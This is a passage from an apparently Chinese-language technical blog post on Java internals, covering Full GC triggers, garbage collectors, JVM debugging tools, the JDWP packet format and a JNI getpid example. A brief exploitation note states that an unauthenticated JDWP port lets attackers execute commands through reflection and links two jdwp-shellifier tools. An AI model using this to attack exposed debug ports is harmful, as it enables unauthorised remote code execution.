GC；如果小于，或者 HandlePromotionFailure 设置不允许冒险，那么就要进行一次 Full GC</p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">Full GC 的触发条件</p><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;font-size: 16px;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);" class="list-paddingleft-1"><li><div style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);"><p style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;">调用 System.gc()</p></div></li><li><div style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);"><p style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;">老年代空间不足、Concurrent Mode Failure（执行 CMS GC 的过程中同时有对象要放入老年代，而此时老年代空间不足）</p></div></li><li><div style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);"><p style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;">空间分配担保失败</p></div></li></ul><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">垃圾收集器</p><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;font-size: 16px;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);" class="list-paddingleft-1"><ol style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">Serial 收集器</p></li></ol><ol start="2" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">ParNew 收集器</p></li></ol><ol start="3" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">Parallel Scavenge 收集器</p></li></ol><ol start="4" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">Serial Old 收集器</p></li></ol><ol start="5" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">Parallel Old 收集器</p></li></ol><ol start="6" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">CMS 收集器</p></li></ol><ol start="7" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">G1 收集器</p></li></ol></ul><h3 style="margin-top: 30px;margin-bottom: 15px;color: rgb(0, 0, 0);font-weight: bold;font-size: 20px;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">JAVA调试工具</h3><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;font-size: 16px;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">加参数-XX:NativeMemoryTracking=detailJVM，使用命令 jcmd pid VM.native_memory detail</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">Thread Dump</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">Java 调试入门工具</p></li><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: square;" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">jps</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">jstack</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">jinfo</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">jmap</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">jstat</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">jdb</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">CHLSDB</p></li></ul><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">Java 调试进阶工具</p></li><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: square;" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">btrace</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">Greys</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">Arthas</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">javOSize</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">JProfiler</p></li></ul><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">其它工具</p></li><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: square;" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">dmesg</p></li></ul><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">JConsole</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">Visual VM</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">Visual GC</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">JProfile</p></li></ul><h2 style="margin-top: 30px;margin-bottom: 15px;color: rgb(0, 0, 0);font-weight: bold;font-size: 22px;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">JPDA</h2><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">Java 平台调试体系（Java Platform Debugger Architecture，JPDA）</p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">层级由低到高分别是</p><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;font-size: 16px;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);" class="list-paddingleft-1"><li><div style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);"><p style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;">java虚拟机工具接口（JVMTI）</p></div></li><li><div style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);"><p style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;">Java 调试连接协议（JDWP）</p></div></li><li><div style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);"><p style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;">Java 调试接口（JDI）</p></div></li></ul><pre style="font-size: 16px;font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace;margin-top: 10px;margin-bottom: 10px;overflow: auto;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;color: rgb(0, 0, 0);letter-spacing: normal;text-align: left;background-color: rgb(255, 255, 255);"><p style="font-size: 12px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);border-radius: 5px;">java -Xdebug -Xrunjdwp:transport=dt_shmem,address=debug,server=y,suspend=y com.xxx.Test</p></pre><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">JDWP是用于规范调试器（Debugger）与目标 JVM 之间通信的协议</p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">JDWP 只规定了具体的格式和布局，而不管你用什么协议来传输数据</p><h3 style="margin-top: 30px;margin-bottom: 15px;color: rgb(0, 0, 0);font-weight: bold;font-size: 20px;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">握手</h3><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">连接建立之后，在发送其他数据包之前，连接双方需要进行握手：</p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">握手过程包括以下步骤：</p><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;font-size: 16px;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">Debugger 端向目标 JVM 发送 14 个字节，也就是包括 14 个 ASCII 字符的字符串 "JDWP-Handshake"。</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">VM 端以相同的 14 个字节答复：JDWP-Handshake。</p></li></ul><h3 style="margin-top: 30px;margin-bottom: 15px;color: rgb(0, 0, 0);font-weight: bold;font-size: 20px;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">JDWP 数据包</h3><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">JDWP 是无状态的协议，JDWP 是异步的，命令包和应答包的 header 大小相等</p><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;font-size: 16px;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);" class="list-paddingleft-1"><li><div style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);"><p style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;">命令包</p></div></li><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: square;" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">length（4 bytes）</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">id（4 bytes）</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">flags（1 byte）</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">command set（1 byte）</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">command（1 byte）该字段用于标识命令集中的具体命令</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">0-63：发给目标 VM 的命令集</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">64-127：发送给调试器的命令集</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">128-256：JVM 提供商自己定义的命令和扩展。</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">调试器可以用命令包来从目标 VM 请求相关信息或者控制程序的执行</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">目标 VM 可以将自身的某些事件（例如断点或异常）用命令数据包的方式通知调试器</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">Header</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">data（长度不固定）</p></li></ul><li><div style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);"><p style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;">应答包</p><h3 style="margin-top: 30px;margin-bottom: 15px;color: black;font-weight: bold;font-size: 20px;">漏洞利用</h3><p style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;">jdb等工具或脚本连接端口（未授权）然后通过反射调用java代码，执行命令</p><p style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;"><a href="https://github.com/IOActive/jdwp-shellifier" target="_blank">https://github.com/IOActive/jdwp-shellifier</a></p><p style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;"><a href="https://github.com/Lz1y/jdwp-shellifier" target="_blank">https://github.com/Lz1y/jdwp-shellifier</a></p></div></li><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: square;" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">length（4 bytes）</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">id（4 bytes）应答包 id 值必须与对应的命令包 ID 相同，id 的取值允许 2^32 个数据包</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">flags（1 byte）用于修改命令的排队和处理方式，也用来标记源自 JVM 的数据包</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">error code（2 bytes）标识是否成功处理了对应的命令包。0 值表示成功，非零值表示错误</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">应答包仅用于对命令包进行响应，并且标明该命令是成功还是失败</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">应答包还可以携带命令中请求的数据（例如字段或变量的值）</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">Header</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">data（Variable）</p></li></ul></ul><h2 style="margin-top: 30px;margin-bottom: 15px;color: rgb(0, 0, 0);font-weight: bold;font-size: 22px;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">JNI\JNA\JNR</h2><h3 style="margin-top: 30px;margin-bottom: 15px;color: rgb(0, 0, 0);font-weight: bold;font-size: 20px;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">JNI</h3><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">Java代码和其他语言（尤其C/C++）写的代码进行交互，只要遵守调用约定即可</p><figure style="margin-top: 10px;margin-bottom: 10px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;font-size: 16px;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);"><figcaption style="margin-top: 5px;text-align: center;color: rgb(136, 136, 136);font-size: 14px;">311340147974036.png</figcaption></figure><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">如果使用JNI技 术调用，我们首先需要使用C语言另外写一个.dll/.so共享库，使用SUN规定的数据结构替代C语言的数据结构，调用已有的 dll/so中公布的函 数。然后再在Java中载入这个库dll/so，最后编写Java native函数作为链接库中函数的代理。经过这些繁琐的步骤才能在Java中调用 本地代码</p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">java创建类</p><pre style="font-size: 16px;font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace;margin-top: 10px;margin-bottom: 10px;overflow: auto;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;color: rgb(0, 0, 0);letter-spacing: normal;text-align: left;background-color: rgb(255, 255, 255);"><p style="font-size: 12px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);border-radius: 5px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">package</span> com.test;<span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">class</span> <span style="color: rgb(230, 192, 123);line-height: 26px;">GetPidJni</span> </span>{    <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">static</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">native</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">long</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">getpid</span><span style="line-height: 26px;">()</span></span>;    <span style="color: rgb(198, 120, 221);line-height: 26px;">static</span> {        System.loadLibrary(<span style="color: rgb(152, 195, 121);line-height: 26px;">"getpidjni"</span>);    }    <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">static</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">void</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">main</span><span style="line-height: 26px;">(String[] args)</span> </span>{        System.out.println(getpid());    }}</p></pre><div style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);"><p style="font-size: 14px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);word-break: break-all;">javac</p> 编译代码 <p style="font-size: 14px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);word-break: break-all;">GetPidJNI.java</p>，然后用 <p style="font-size: 14px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);word-break: break-all;">javah</p> 生成 JNI 头文件</div><pre style="font-size: 16px;font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace;margin-top: 10px;margin-bottom: 10px;overflow: auto;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;color: rgb(0, 0, 0);letter-spacing: normal;text-align: left;background-color: rgb(255, 255, 255);"><p style="font-size: 12px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);border-radius: 5px;"><span style="color: rgb(97, 174, 238);line-height: 26px;">$</span><span style="line-height: 26px;"> mkdir -p target/classes</span><span style="color: rgb(97, 174, 238);line-height: 26px;">$</span><span style="line-height: 26px;"> javac src/main/java/com/<span style="color: rgb(230, 192, 123);line-height: 26px;">test</span>/GetPidJni.java -d <span style="color: rgb(152, 195, 121);line-height: 26px;">"target/classes"</span></span><span style="color: rgb(97, 174, 238);line-height: 26px;">$</span><span style="line-height: 26px;"> javah -cp <span style="color: rgb(152, 195, 121);line-height: 26px;">"target/classes"</span> com.test.GetPidJni</span></p></pre><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">头文件如下</p><pre style="font-size: 16px;font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace;margin-top: 10px;margin-bottom: 10px;overflow: auto;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;color: rgb(0, 0, 0);letter-spacing: normal;text-align: left;background-color: rgb(255, 255, 255);"><p style="font-size: 12px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);border-radius: 5px;"><span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">/* DO NOT EDIT THIS FILE - it is machine generated */</span><span style="color: rgb(97, 174, 238);line-height: 26px;">#<span style="line-height: 26px;">include</span> <span style="color: rgb(152, 195, 121);line-height: 26px;"><jni.h></span></span><span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">/* Header for class com_test_GetPidJni */</span><span style="color: rgb(97, 174, 238);line-height: 26px;">#<span style="line-height: 26px;">ifndef</span> _Included_com_test_GetPidJni</span><span style="color: rgb(97, 174, 238);line-height: 26px;">#<span style="line-height: 26px;">define</span> _Included_com_test_GetPidJni</span><span style="color: rgb(97, 174, 238);line-height: 26px;">#<span style="line-height: 26px;">ifdef</span> __cplusplus</span><span style="color: rgb(198, 120, 221);line-height: 26px;">extern</span> <span style="color: rgb(152, 195, 121);line-height: 26px;">"C"</span> {<span style="color: rgb(97, 174, 238);line-height: 26px;">#<span style="line-height: 26px;">endif</span></span><span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">/* * Class:     com_test_GetPidJni * Method:    getpid * Signature: ()J */</span><span style="line-height: 26px;">JNIEXPORT jlong JNICALL <span style="color: rgb(97, 174, 238);line-height: 26px;">Java_com_test_GetPidJni_getpid</span>  <span style="line-height: 26px;">(JNIEnv *, jclass)</span></span>;<span style="color: rgb(97, 174, 238);line-height: 26px;">#<span style="line-height: 26px;">ifdef</span> __cplusplus</span>}<span style="color: rgb(97, 174, 238);line-height: 26px;">#<span style="line-height: 26px;">endif</span></span><span style="color: rgb(97, 174, 238);line-height: 26px;">#<span style="line-height: 26px;">endif</span></span></p></pre><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">实现头文件</p><pre style="font-size: 16px;font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace;margin-top: 10px;margin-bottom: 10px;overflow: auto;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;color: rgb(0, 0, 0);letter-spacing: normal;text-align: left;background-color: rgb(255, 255, 255);"><p style="font-size: 12px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);border-radius: 5px;"><span style="color: rgb(97, 174, 238);line-height: 26px;">#<span style="line-height: 26px;">include</span> <span style="color: rgb(152, 195, 121);line-height: 26px;">"com_test_GetPidJni.h"</span></span><span style="line-height: 26px;">JNIEXPORT jlong JNICALL<span style="color: rgb(97, 174, 238);line-height: 26px;">Java_com_test_GetPidJni_getpid</span> <span style="line-height: 26px;">(JNIEnv * env, jclass c)</span> </span>{    <span style="color: rgb(198, 120, 221);line-height: 26px;">return</span> getpid();}</p></pre><div style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">编译 <p style="font-size: 14px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);word-break: break-all;">com_test_GetPidJni.c</p>，生成 <p style="font-size: 14px;font-family: 